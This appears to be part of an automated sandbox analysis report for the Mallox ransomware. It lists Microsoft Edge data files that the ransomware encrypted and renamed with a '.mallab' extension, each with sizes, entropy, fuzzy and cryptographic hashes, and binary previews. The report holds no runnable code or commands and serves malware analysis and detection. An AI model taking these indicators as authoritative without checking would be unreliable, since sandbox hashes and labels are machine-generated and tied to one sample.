                    SHA-512:9499EE2E347230FD75BE16E324B40028859A192E3571F7F7FBA8A7EB63FDAA6F6EB61F17CB16FB372A592417327A010AE3968B90988387C7FE030C1D35B72886
                    Malicious:true
                    Preview:...,=..A&..(s..'...Z.m.7..?....m.....BK.pN.......F.~...n!..8..%.................Jr.GJ....{.D......U..Me......;.vS.e..7......a..V....p.$`G~....fA@.,..Y.O.u.9C......Y+........X,.C....r$1..O<Z.a.....`.....\.!!Qh..'...7..".X....m.....W].~....a{,...S.....&...c[d.O......C2......G3...$.;..B..(........X..k.\.W...m.m.l...?W{..W.^.t...y...$B..c4^.....@.l&6$*. ....G.....GE...Y..).o...v..C...d%..z...4G^.?c4`...d.{..]PMd5..q....+....W.@.0..i.l..._.k....V....[..:Tu.....9...;...b..<\2H....,".....@P2...O......w.8.\.x6.+k`...T....h....uq.xOP.. ^.D.L....0{$F;..bV+...4...........~.A:....9w..M.[...`....D.......R._E.x#.m5.....1.W....a.6.!...;....GO..}T...!....n.n......$.....n,.&83...4.$..l!._.@.q}k....,7n.E.(...J.2..}v..:JC..IBC@..V(.n.3....O.[.k"...JQ.....R......../.M_....../*......<.8+.Q.=..o....J:f.`t..N.t.p.y...{&..U..$......qa.Y?&]...t.%....F..Z.F..2..N......p...9...N..'kt. ...$...A.1....p..:..7....XkK%R.c...ev.=%...l.>....'./L.t%-S....I..C...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.50\LICENSE.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):24729
                    Entropy (8bit):7.992131487828613
                    Encrypted:true
                    SSDEEP:384:BauHDGBIx2T64R9JJM66dG3eWxEA5YDRfkb9nYoP5sQiaCtdp2r2XTDP4ZVS55dT:4uHDPv4VildG5EhpkOesACUM4zS5PN4U
                    MD5:E07F0A23B0B09389325DD969B8357A88
                    SHA1:82A25965E66D65A1189600A11686F4313D23FC3E
                    SHA-256:392A60383FC24D9E7FA3580E1CEFD8A6791CD845EE855949CCAD936A58FF47FA
                    SHA-512:2D7C3A7CAECC8C1A21A9FA63D7454D8E59637C7313AA08B9ED7DD18D6EC03CF30DECAF2A2697260A8D9D5DFC32D01117116376E89BCBBBEC30BE6535F23F7773
                    Malicious:true
                    Preview:.;Ewn..5......r. .a.C'F.U.v0bm.S.7..[(...U...*;N3....-..%.....\.&?.w...0........m...U..~v.r.Or..}......\.........fe..^...n.jR.X*.g"?j.U...c..0y...GA...V(.=...Wuwm..:.O2zh.j.R(w............../..nnO...>.`t....~..pXu......z..w.>&.. .V....y..?P .>.!=1>....f.2....nU...+...p..K.T..:o..I....*..h..T.FMT.s.J.K......\.o....D.....&"..U..DN...2$(|...F.r....C.z..*b......4...G...).^.q]t]~].PF....:.R.53!....Ux...L!1Qf...,/i..W0...4....GJ.yf...S;........i.O.{.....[..=.=.......W...Iwq.m.M.."...I...+..:h$(./..2.B.X(...K.8.?U..XrT.Jz6..+.v...T.q....(.=..pS}s-.)....".SF8....g>.?..Cf.9k.D.2<.y.......fs"..;.w...F....../9...:....>.....9..pF&D..]oT....i`$4....+....".V.:y.i..m.S..zt......Ai.0.'...+......Y%U/D.{.~{6o.Q.~L.8.. ..%.N.7..hq../../.9.Z..N...>F..[.FK.........e?G....>..4n..`1..X.y.Z..#...C..~.....k....I.%...a.`.4{ ./........n.7q'...f.3U$........w.0......%..7I%....lQ...uKe....X....e1...E...Y\.V^.q...n..u.@...(..v.`.....#..(.SL{V. CE.....i..6^

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.50\Ruleset Data.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):2983412
                    Entropy (8bit):7.999946474980346
                    Encrypted:true
                    SSDEEP:49152:+5hoxUb9MjvgWHmRhTP0otrGKjLoJxm9ICoMAUJLPJ4EdUZfbFn2ckzzihRHNp48:+5hmUiDHGX8oNlL8R05J4Hfx8gRtm8
                    MD5:741204AB6DB55B1F9975759BB1E79815
                    SHA1:31FBE94523EFFB0C25D24BCDA90DCCCE9C876F40
                    SHA-256:12767B65DDBD9F4D0A7032FB445FD437252D2BB78569560878C722052B28F673
                    SHA-512:D3E062D92D03C079F5BD3692011C4D777F3CEFBE32D09F6196E58F1FB42B0CA905F1226629856FE13B9D9A12CA2F7C412BA10F8DE31F451C67C107FD6D671816
                    Malicious:true
                    Preview:=.R/.DA.....^....w.Z$.U...y.....K.M........t..0...^.8|.Z..m....K.U,..M*.D.6.u}JE...F,=.N;..?.-?...{=n=8.]....kQ.3....\Sq|B.9.....l.a6._..m.;Oi...d!....Y.@=dm....{.[$66...j.qx.DO_.~..y&Z.2.:xl.@.@)....P.%....Aa..f<).4A....ln`w......?......&.........1......)q.:....'.0bbJ.D..l...s.....?...+/....;...."I..<1.-.N.^...=h.g.x..:'|6...B..8.\....b.QK..rH.]>.,9..kC..(.7.p.*.E=.N.....o....:w.S?.........}.Z/X4{....hVQ#.}6.sC..@...G9.Q.......G...).0...L..@..cq.O..%.v..7...9..I..`..n...ox;.j....N_.../........0=........".9..k..T.KC.S...dW.]..........j,'%v..%.<1q.M.6......D..I...p.q....3w.,....Sv.8..b.;..#I....p.......*.lc.P..x.q.Y}.....w.g..h......b$/...(.Ov....Anx[.f...0%#H.lFHy.vi.w..rM...h...7\"..../EP0.5;r........tg..oj.@..$..........*M....Y.t....{...l%..vqN...<&....A.e.x....^.8..<.(R.V)..K.....&k....S.c.....[.t*.$.......$.l..q.z......9..fA>.7b..].X?..3...Y..[...e.p]. 2...Rp7BWY17..k..{.m..s..8.~.....}..b.$.f(~.6.$L?R.6....SW....W...3....a..V..y.@....*....J.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Filtering Rules-AA.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):413670
                    Entropy (8bit):7.999542652248837
                    Encrypted:true
                    SSDEEP:6144:G9G9elNPcO6d1azKkGVuLUp+NKPsRnSJYIHYGXbuey1UrjR3pZioMfEJptwT3I:4SeAO6d3LUQYqfLuelh3bYfqgI
                    MD5:F44BC540B324574C2378F1870F6DFA9B
                    SHA1:C961FAD40DDA3D24E682E4800C2452816A2C9443
                    SHA-256:7405AF7ECD2F7FFB9E8436780CD52888F07F321B4AAA716A048F7700B552DC30
                    SHA-512:A10CB4BB231DEF931048CF329D2748401AB9314A1ED90F1039C989D6E082A067F0E4494B7F3F40179D211B12829EF67E5638FD8BE7467DE61865B7DC1302D750
                    Malicious:true
                    Preview:l.J...\.Q...7$.........#...i.x,hI........@.q ...Y6.....{ .\h..9....H.!o...vS..."{..n.....X.>:D..g....U...ja....MQ..1Z.I..AD..l...%F|.......Ka.5_9u[.y.d1...B.bh.3..>a..........r.R.e..L........j.+SF...........Eq..+ZIY8..d...\.:.-cq_;Lr..L....bGsx..^H..7.e..{l.O4;..x.!.L...'CDWh.<./t...n.]....r!b.E;R.l`.6....F5:@..r.O.^.|pux....!fF."...RE.`.S=H......%3.f...h.e..K...|;.({+3..I...dV....Om..]....\.B..g.6...ye../b.@.N..f&...t ..:L...jwe..<. .>6l.[..3..g.^..)..I... ._Q.bp..7.~4-......e~..v.........~%@\.X.j.gh......r.l...`Q....t...$..n........ ].)}.7m..6...,.U..W..f....]....2.....-.K....<d.8Y.y.g..5#..C.87m......O.peK.I.,3.Z......i.D...N..]..Ej.XS.....'...c....%...b.:.G...h...yc..VM.h...<.........K..G.Z6.L:..g.5;.....U........cG3..7`.}....-(.....=.w..s.o......B....}....^..V..k..r..`......W0.....V.l..w/.{.......p).....x..$./.p{7.....Zy...H.v.n..kK.._.......Y.y-.....,~U_j..N4b..j17.....`........I...TM.!.V....@X;j.t.c .N.[Y;#..s).g..s... .

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Filtering Rules.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1850163
                    Entropy (8bit):7.999903080897401
                    Encrypted:true
                    SSDEEP:49152:87mmxChVFAbqaRBtyW9PnCsuGe5v6DAJ9aTclx9+E:87m/hG5yW9PCsuR8c1+E
                    MD5:5A022F2058444CC214FED7DD30FE4A00
                    SHA1:2B867BD4A679EDF6DF831FA7F4801B3447DDBDFE
                    SHA-256:1DDBFBC00CE0B4C87B76E4D926DFB4EEE31F0B216117B34E6FEB9A9177FB78F2
                    SHA-512:68134FDDC91301F95BEB9DD02F1F32A617622D5AB90F9C900A84540E1713AAFA4EDF8FC3DB08A5E543F3BDD0E9DA4DFBDDD7593D0586D45BD7846BD4CEF830AB
                    Malicious:true
                    Preview:d.x=..cG.D?.q0.<w.s....2.+...v..6`tL..M`.....I.D..y:.@V.W...[...r...j... ..N.q.........di....6~.u.?G..."..]h._..{.RK.|8.9I.........k.FS*.i......T...{@....5f:!..G.......f...rm.'.......B..3.d.......h.Q^.J.R.N..E..X.s..I......7.X.P.:.N...N-..N.^..&)/r...?j&......g..ZK.$...&x....9 %+.?..p..-.RD.1k..Jj.w.h..g..sf*...{..BN...k3.n....G.....D..+..D.2....../...@..T...:......$I.....X..n.....@,a...Q.@u.l.......3.3N......1.U....t).^...V..l...l....?:K..2as.{...xS\n.(.."0..D.7......lR*}*>3w..h..N.B.uRHI]......h_F#...}.Go.......D...5..y.TU.Vw.....vA.A.2,.._..{.."...,A...+q....Ml..B...g..M...4..%eG....F.....Q.}Z4....!.n......+2........m.i.Z...e....I..\...6...>g=".D...OMq.D...........EM...h.P.O<w.`?..bn..-O.u*.... ..(.=... .512.&.i..O.F...4.:J=.[..d.=]...E..y......q......f.F.O1..S.T....&.yD..!...3%v.=&.K........d..A.$/.x.r..d..~...."..sy....`..5O.:..g....d......N...^.....I.%...-7.rUr....Wu4dc..t.......3..~4~......L!....X...9Gm....t..."..P......

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\LICENSE.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):24729
                    Entropy (8bit):7.992387389860218
                    Encrypted:true
                    SSDEEP:768:zkHzsDqxSmRY2t0CWE1Yenbl3zWrW8nvgp3de2Y1:zix7J6Anbl3zngvkEL
                    MD5:0D42114A2F47C70D4B3ED45AAD5081E4
                    SHA1:1ACA3AB8FE1B55A3E593278C74192C39B8CE9F8A
                    SHA-256:C9C5B841FD6D99BA8D327AD78511E1AB3EA0885C9783597E670B3A5CD1436936
                    SHA-512:EC424C41FF1975A7C858848A65194283A95E4DE3866FC8A2F8BAD357163AFCB2961A60DD9EB4ECF1047B59FAA042D7F7A83A14FC9DD8E0A0DD1DB34EB6D1C823
                    Malicious:true
                    Preview:5lL1.R.....#...)J.|i.>p.v..F.#...._......>2.E......Z..(............]..z..:.k...Q...|......Q..K.L&..!UOy....z%.._...6.9>..~.Ry#.}z..........e..:..|....2.j./..E..-P....9.,..~.....#/.(RC\....%.n.<E..B.f....`0...}.^........BQ..t%...el.%:M+.m....~.$'.;..B......G.$..S.t...'^..5..o.EM.C.a......0..:.q.7 .C..[C`. .....T....W._..@........I....;...Y~..p.p...w.S.....F.Q@..U.......v.h.]Y.,y.ZZE......M.w..W$.n_1]"....j.....H../V1..|.a.*...9..B}.r..os.).....K....4-]....I<.{.nLh...r.O...`P$........!...H.....n...Hm.......~...e'.....g..{...N$.7_..u...{...R~....-f:..../..;....%......Js;.......[..2.......&...9w..S6...Ql.}V...csV....j@k."..f"00...ze.."T).....q.I....Q....@....Q.gF.....!.w.q....w..$../....-...1.....&./_.K..$.t.....W....<.....Z.q.2..4...z......J,zmp2p..._Tk.Q...tR.wp:...B4..Plx..|z!....t......6{..O.VZwc%o..D..aJ.Q..B2|xL.>.P.....Y..=f2..b.._.......?\..uO.......7.":.lm.hd.;L.a..|.u.;....h^.A.Q.i}.S..O.o.+...t.(.Di.2If.VTb...$.m.....![......

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-DE.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):227595
                    Entropy (8bit):7.999187564280914
                    Encrypted:true
                    SSDEEP:6144:bjx1pZJdEjay8kGQNw6k/FzCDSYLGOTPg08Lmv1jODjRZ:nx1huQbOuFGPGOMCjoRZ
                    MD5:1C6146563B73C6968BFEB3B7C39E5B35
                    SHA1:AA965C3E265037848EC384CFBBE8795DD895E2D7
                    SHA-256:6C615AC38FCAE4E62E58206373ED4DE2360A11336F5CF047A9BDE6B2BB562899
                    SHA-512:DFB4A4BB1CA347F702AC25D5B0B2FC45A11F70333E7962534EB68C6E53D2B71551CBC4A2476AE768B459955EA5763CC9A04DA90D69FEEFF78D3851B76DDFD33C
                    Malicious:true
                    Preview:q.B/mf8..$Q...j.(...Q....)..7..k4`...f...!...........J..,.Y+...QO..l`7.;g...&........`..O..Lx......j.D...n...O"h[;.2RV.R.6I.]..*.+_.G.\..R.G]..9.g.......4C..E._d....2.T.l.yM..h<..V?'Vn,...k... ..'K...I._<....9....r..p1.D0*...-..".>~AA`:c..M..S...CR3]....H...>u.ou=....-...L1f.).4.h.'W.O..T.?KT}.$..........`\L.:..../.`...Q.JV......c.S.(".3.[....t.3.~.r..F....>.Q.R....*..E.../......`..[~=M.=#5.3n<a.H.......xFx.cM.p_|.y_;'.....7.q...Q.m...8.......l..1..[..Z....Uj}'..V..@.Rgh{j...t.......V."....^....z.{n0.:..!*F........k.;>Y.[x..:.4~!}r.......2.r$.T\..4.i.v.MG.6.@VB'`o....D.....W....`..T...P..k.CQ>.D.2.....g.rH.L7...7)KNL....zdx...FE....'q.a..>.vo.""....%h..n...[8.>].q;.u..H....r..}y0.....p...."j{.~U.t.d.z........G....y(..V._.y....n.|{..$..r.C x2.^l.$...v..N..+_...-B*&"..f.......pYN/.1..Up...X$.#)...=.z..?@...k.2..9....4j.o.-.\..h..{..8.9.A.....g.n..|...-....T.^i!.........<N..4...@W..O.fS.....#.....0*^.`/....@..r..X.+..95...q.!/.T!z.....z...z.G

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-ES.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:MPEG-4 LOAS
                    Category:dropped
                    Size (bytes):158269
                    Entropy (8bit):7.998677674560801
                    Encrypted:true
                    SSDEEP:3072:Bug1IZwTHuo+9Jn7NoapHgO5g413o2ny9nKN6uU3xuAy2/DdxE7n01mYuu3:cdZ4uooNoqHgOj13py9omModxmnQ
                    MD5:74EF552A4C23E340D59111C7FF4B0A15
                    SHA1:5709C13FD83B0D855393C8E37BAA18C6FB546191
                    SHA-256:2F40EC8060ED900809BD181A319642E5D3C05667750755289CABE08BC5EBA6FF
                    SHA-512:35A0821888E7C0B974D9D34F5B50A972D68E69F1A6D708D45065715664EE172F7FE44F57EB53AFDEBBC2BECA6698EAE5173E9AE2263F187C5D558913F0ED5844
                    Malicious:true
                    Preview:V... ).4.G...u..U.7a#8|.j~.B.L.._...6.........a.;..bN.o.....y..].=..'...x..-..}.....i.\,`..9.5..du.0..-?..5....2{.Z.c..<...eHV......`.SA,.\;.......Q..lL}.CJ.....k.!.<..Bi.:.l.z<U..am.k......-.(.T./.t@..yQ......E!.}....R..7...#-..K.M..5....,...4..Z9..#S......a...../r..K.v.h.......H5........vK.W....Fl....Bw.....B...M]..RN...........V.k.A.`6y"..l.ftx.........&.c.s0.O..Z..4.kb.L.>E..B.b..+7nY:....H..t..%rN2....!.....O..y..b..!...=.ODANL...>6.T.sI....EZY.x..N.l...Z.(.x.nN....HWM.\..I-.]....y..?=lk"..f.....Y.............a...i.@.U.&...h..+..T..h..N.kxF....J.....n...|dR.f....-...d...,.....#D..@k........4...\.N=..?...:..H9..E...D....K..b.....{.sO..."..O...w.?.w.t@..3.L.=..^.P.....7....H...E.)I...0..v......D...h.y<e8 .|GM{.?.:...]f]p....4x.?P..<...<.....{;..NaZ........rT.\......Kf}=Qz....v.)..xr..[.a....A....+V..5.........<o.Y..P....F........}cz...o[.........ih.0iD..r.[5..D...#.:..y..0...;.b5+.......+./.`.C.:.U/..28. ..fy..Z........d.$.k.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-FR.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):767031
                    Entropy (8bit):7.999763293972065
                    Encrypted:true
                    SSDEEP:12288:NR+gVSFJ97LxEZmXdLlsIQKACkcHmztAXxVxGUltcVF4tqNtrItp0brjAN2Y2z:NROAcBCIQKAZWXxuUltOF4t4trY23r
                    MD5:6DEEF37432A1337DCEC6C6A828335FE4
                    SHA1:4FF97C23C1D5517F74A5698B95E3CCA13C8B0B63
                    SHA-256:3ED203B3F4E7339B390B9A415B7E4BC6D9CAD9A13223CF05CD77082C2B664CA1
                    SHA-512:FFD51CC3A493918F527A1CF1E97A8D64DD54645D7F290382EFEFBA485C2A4274EFE52FB140D3A8837DD944011FAEEBB23ECA188BEDD34A94943D35AE8344BA6B
                    Malicious:true
                    Preview:..1qW?/.v.....9M4....E...\../..z..?...:.P4...t.{`...L..Z.R..(..$H.0.....$..C.o.0j.Q..!...rx.?.#....$.k.....~[DW.T(...pZ.3./4.....LM.O._.En...4..p.u...c.T...pQ.S;?q...Jg|.(=..`..c....k..(.k./...P.<=...G..0.=.Lbm.J.......s.bJS...P....mOk....-....~..g...e../.`.O.l...+\.!.+.f....V...T....T.0.^Fx-...*..{.8H.K...h..?ol0...^R.V-TuPA.d.W...j.bfY....%...v}/5.e.`..T..1...-..R@H9../|....).V.1.Z....K.'....fWG...d...... .S.M....F$......l.K.....T..o...X..1.......I....7.;e...E..p.. .F.}^[b.2...5...."]..~...i..&...".........Q...".t....r/..z*.*2W.r..VF._F.j.sVVI/+!r.+..W...5.".,y.~jO._..|..j.3.1JN.bb.Q.H.e.l.%...w.=.^Q.U@....|........M.8n.A..&.o...^_...)L.7_.BO..x~j...dY5U...S.....i..P_uY.~2...%....B?...t.|.k..%}.....g.s0..'...D.5T.......}.....k-.#0o.t..$.u..Wg.E..P..z[.$..Fn.."Ka.1..".....%...p...^.$f..p..W.yp.C=..SQ...n...._.W..*....".@S..!....@.m+c.W.5q.G.\y.F.j.....Q.j>gb[.. ....Q.A.....~...l...'..Z..~a.(YB...3/|..../.IX..;.....%...N-.?.?...O.Kbss

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-IT.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):510400
                    Entropy (8bit):7.9996218868177085
                    Encrypted:true
                    SSDEEP:6144:1fFJQkBz5ildpcDR4Y1BlMc9cTK2zam1YkBwtONi+uDYCwGh0/vcnBq4Thor8qrN:1fFJ1zOr6tW1hPzNiTHs/UXly8qIwERW
                    MD5:DA9E6092B113BE898A5ABEC54257585D
                    SHA1:EC858E0606C5FAEB0D6654D16F51FA8EA746E987
                    SHA-256:736BC41DB1871BCFC910F4D85751066B92EB567874388939C12F3BD19B3450C7
                    SHA-512:47CCB0D845569607FDDCB96EFC2E685EFACFE34E0E7A999DD1B0498AE59BCF54457C1559AC748D82B4F942F80DEC790387B548FC6E11E344A02916C934BC2845
                    Malicious:true
                    Preview:1....,]7.LJ.....0[.(.....Nv..........j<..n.&=...af.D.:A.S......FO%.Y.*.ZN.zd.7.q.A..I....(.....(...GBuwz%J.;..R9$.Y..A.&sY.........|6w.../.P..HP8...o=....ne.Ue.......a.........>'.Y...~4........v....<..-SA.Y.c6.:...Kg......D..s.S.@......,.a..c...Lo........v.....j..5.+.$I.{....q.s.aaW,g..<3.E".`...Mn..b..T.c}.7m.y..<.?9n<.f*A..\....56..-Su...<.R].I$0..kK.#m.)......{...7l3...I...j....uq.F0]..s...]@.O`R........q..Y....Jc.f..G.....g...,.BKzC..0r.(QR9T.p{n..f./.2.. .f..c.Q$U..w)bPB...`_..O........4era.3....wT/..i.8..w.Y.z.REA.(gg.=Z.CR.Be.:.oj..`.....t...[.s.....G.*.'_]..5.....`h..i..5.....N.+D.L.n..{0y<+..yh...]...)UJ.....!>./.`.~=.Ca........C*...V.......k).!uHNvE.."!66...m(i.....,j.,..)..ee`...a.D..8.Y.........rasa. .u._.U..|.+6..%....).Z.~x4..x..m.._.........$.KR\..Kl...._..#.w.d.b.k..! X..*.I.9.......s..$.W....L.l.c.w...5a..N..L0\a....rH.J..1.W..w...;'.$....t......[uF..C..&i.Y.m.}%.g.c.......q..~..23m.b"...$.....\.@....0.N.<e..h*.....O

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-NL.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):51983
                    Entropy (8bit):7.996406315375883
                    Encrypted:true
                    SSDEEP:1536:9/lTxvLSzcRWYLCs5iXE57fVeEeKVuqZC:39ePUtj5UEeKgD
                    MD5:1F97F48C85E23FF796167D6A6323A6A9
                    SHA1:92044597EE19E44083329926745E754D5005AA45
                    SHA-256:FBA1D6918CC37580DB13FE07834D9359152A4CBB1E5E0D9D24005E21484A4FC2
                    SHA-512:6696C0E3ACB65F8D1AFD5D519DF2F10C31CEA49E6D8689AFDF3D64D7F2A2B63AC429488389142CC07B2F325D1D47C5C69F21380A743B823F859913A4E817395F
                    Malicious:true
                    Preview:o.?:.u..g.........ym....(.a....G....'A...%(........OzJ....d..[......w...w .-S.U.......x...;.... V......_.A..T.g5@.6o..$......'?.J7.^..gQh...G\.jE.{.).;......o.l^.|u..G9).'..0..H...... ..z....W..x....0....9^o.).A.+.!..80;.3..,.Z...#X~7..R....M..s.9.Bs.....RJ.4.4`.l..9T..0+.58......T..w.D/9_m^.+$.m e..i.<L]".....rr[...D.K..Q........n1..&.q.^...ZS.gp...#=o..?#f..=L..Uq.v....y_..#.'`;......f..i.e..\.+.=C.UZ...Vr..k...#.7.W...Yv..q.O.4......5.H....T/t`I........?.kN....e.-..F....E.5.......u..B._..)....Z.f............#..:.w..a.........j........H..w.......W..Rv.R6.....J.r..zA,93..'.f?.......C......6..7..3i.5O[.j..S....P.p+p~.&jH.).../c...1.3....K>,-Dv+..9A.Ur..f....%.6...LDLtMi...>z..#k...b\.E.......[..eL......b._....6Q. ..5....8.?%....c.H1...?..T.....:...b.._..pb...C.P..d@..D.D.O.Y.hsh..L16..8,.u.S.%....A.}..Y........h.x..Yve.....p.x.t..#.!.^..Hv...>.......mn.....W..n..4O.J....6.Jv....B.05.XN..uD..~.P...ro'K.W.j#.>.....Aw1\b....)...#.m.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-RU.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1211639
                    Entropy (8bit):7.9998439919736
                    Encrypted:true
                    SSDEEP:24576:HgqPEn0n+AFUOG4HQ2/F2rU3uixIieR7knESZi15Cq/g8RXm7ooxu/zJ6:HnM0+o1QWwrUXIYti3oubJ6
                    MD5:A7512BF4792D30EE79CA6276C218C774
                    SHA1:FB8B771E9D71F99B771E8AA5170433B1BACB7F4E
                    SHA-256:EEE2B269622650A63AF06BCC178374990833FB83E0C0088A52665BDA8D835FF0
                    SHA-512:0CD2BDF9D269E7375FF469CB7723D90432E54D35714D0E581F547D9266D53F13DBAE426F8487EB6B5A6EDB1D627F550EB9EEA67688440C81C1B2B985D3BFCC6B
                    Malicious:true
                    Preview:.Vc..Q.O.t.|C.U..V.\m8.S..o.5.A.]. .o.......*..Wz..n.D..s..r.^..~`...1p.[f...(1M....i..)T...xXGj..^.I..)....^..j..Fk.N.s...$...X{..m.K...8.*C.]/.+.....m`...^...R~QN.L-x.JmR......jw\.7.'.A.@...(.,..u...D......N.*..R...J........,.]d_h].)..{.}I.Q..$..t7.=.I...C...p...e#..S.N.A.....C@).t...]...BpQ6.m.L..lW.)..u6z.C..F.}z.$..1...oh.Q..?L...F.........$..._...A..Cs.X...}....9..........QH..>...c.)..p..V.<..C...R.)..BN..!U3.d.6mhh..D..0.%.....c...x'.*.._.O......~...-..a...xg=......(.~S..9(.....cW.8.....{......k.3...\.J....f..7...7S....N.....]o6v.V+.3..NU{..T&..t..e;.1Ud.....75H.....<.`_..sT.fv.........k..$.t.U.++....].Q9LP.|..M.....@E.#...d...Z.F..po...7.$...f~Q...,...3.*.aI...d.....qw...^J&.......)~\....Q.2e...."p,............k........v...6.f.........MScU0~..`j>u.._.w.p./u...........*.e..g..;...#k.l...!)5...0..........R..9,WK.>...HB.*.a..F..+X..l.a...I..tf|.w.,.[+......^..2....].\.`.r..E/.Y..O..".].x.+..6..<.m.U..HlS=..9..3..6.Hnbz..1..bq....";....o>.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-ZH.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):860131
                    Entropy (8bit):7.999768140398526
                    Encrypted:true
                    SSDEEP:24576:DRzRFUy/SOGltS+GwiKhBUzpjnOAwTY5dwEzjFjU:tdUHSVrsAwTgdwEz2
                    MD5:B1C145361D81B9E600E1FD557EA4AB11
                    SHA1:19D637D807FE713FB7D527123A7BFE15A7298694
                    SHA-256:1C9F6F785F0BDA5B1E4A1E07BFF15B1CD6FA6A15C1EC6641138920F2D533229D
                    SHA-512:957C272182D1AD4039659C0FE3F3D61C0A1859F9D6CBC60AA318B989143A4F5CDC07BB329C2D66782FC5AC3E765EE2155CE36B73CD13086667B964A8C1D0A633
                    Malicious:true
                    Preview:t......x.7..B(..s....=.........!.q..A...14..:...Mz.g=.|....z..D...j..6..'..M..:.5........#..L..b.MLt......JT.n.']jM..>W..Bcg.l....5|..m...{9n......<.....o..1.(c.~.tn.lJy!);r..........grW.#..8G!.x_.G..YG..y..N...9.;.C..=.... .|.@..$...s.4....v.q.j.m..z...{.+.!.(...7.....cB....cV.w.@.TD..b.'BQ.../3`...v....cAKQ.m..<..)6yL..Z..G..A9T}.2.(....@.'.8..&....$M.i..[.!.M^^.....$....,.y$..m]../.Ss...,..K;.FZv.{.......3.).g..T.0q...1dG..mb.zB......GO..d......2..L.7r......W.......S<j`}...*....d7...1.O<..,j..j..Cd..Q..::...W..Gh..e.O..y.?,#.7...5..Wc..I.4..._ v.N..4.6..Y...._.=>..m..d,..o....8.u......?.....k.Rl.....'..>..?r.\.U.q.T.t.....w.q5...#.....UX,.........z..Y.........?<.PA..l..m.%..`.~*H..:..vvA.>...[.Q.?.X.6f......3.g.....Gq.Z*..7...s....[...N:9vk.V..v...2.p]&...Fe..."uvf.\.....r...9c.)..|..4..vyd.5..c.]..j.t....I.3.;E..p...T.....^o:=.&...=...........a.8..t..u)X...Y0.@../.F\..|h.F..8M.Y...7m.=.3.^...S..87bv.Rc..f..?..Y.<v...."....>TQ..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Typosquatting\1.20231005.1.0\typosquatting_list.pb.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):169183
                    Entropy (8bit):7.998846053061141
                    Encrypted:true
                    SSDEEP:3072:ilAVDolShKDgPdegokW7ubY0Nams/Xg1J8/c/Oa2TwuuurPnex:3oYYD+egwK7zs/eJWyOzFdPnO
                    MD5:288C7F0A328F081FB75350EA1EC39B91
                    SHA1:7CC47120FE4EDB3E461E393C341C3E88AC3308A0
                    SHA-256:A5009A814C3A18EB7553BCE3827CBB9472243C7C7A62F54E105F3A5657E3C593
                    SHA-512:8594E7649B4A7B86B89E1A1191BC5B3A716FAFDCF7C30D16C45104EE27B8ABEFCA55C3A82FF0B99E9F4A08E1999B285E3647DA9BC854245960242648DECD5DA6
                    Malicious:true
